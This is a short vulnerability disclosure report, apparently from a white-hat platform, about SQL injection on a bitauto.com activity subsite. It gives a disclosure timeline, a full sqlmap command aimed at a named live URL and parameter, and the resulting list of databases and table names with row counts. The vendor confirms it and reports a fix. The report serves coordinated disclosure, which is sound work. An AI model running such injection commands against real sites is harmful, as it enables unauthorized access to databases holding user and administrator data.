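2014-10-07: Details reported to the vendor; awaiting vendor response
2014-10-08: Vendor confirmed; details disclosed to the vendor only
2014-10-18: Details disclosed to core white hats and relevant domain experts
2014-10-28: Details disclosed to regular white hats
2014-11-07: Details disclosed to intern white hats
2014-11-21: Details disclosed to the public
SQL injection on a 易车网 (bitauto.com) subsite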
sqlmap.py -u http://hd.bitauto.com/activity/?id=45 -p id --threads=10 --level=5 --risk=3 --text-only --dbs
available databases [3]:
[*] hd_huodong
[*] information_schema
[*] test
Database: hd_huodong
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| ippool               | 345661  |
| activity_dealer      | 5827    |
| statistics           | 4575    |
| activity_signup      | 2368    |
| region               | 2109    |
| admins_login_log     | 1196    |
| activity_area        | 1031    |
| activity_content     | 82      |
| activity_intention   | 67      |
| admins_purview       | 51      |
| activity_brand       | 39      |
| activity             | 33      |
| admins               | 17      |
| activity_focus       | 9       |
| activity_auto_detail | 7       |
| weixin_user          | 7       |
| admins_group         | 5       |
| dealer_activity      | 4       |
| media                | 3       |
| system               | 3       |
| resource_class       | 2       |
| dealer_user          | 1       |
| resource             | 1       |
| resource_type        | 1       |
+----------------------+---------+
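As above.
Filtering.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-10-08 09:41
Thank you very much for reporting this vulnerability; we will handle it promptly.
2014-10-08: Thank you very much; we have finished fixing the vulnerability.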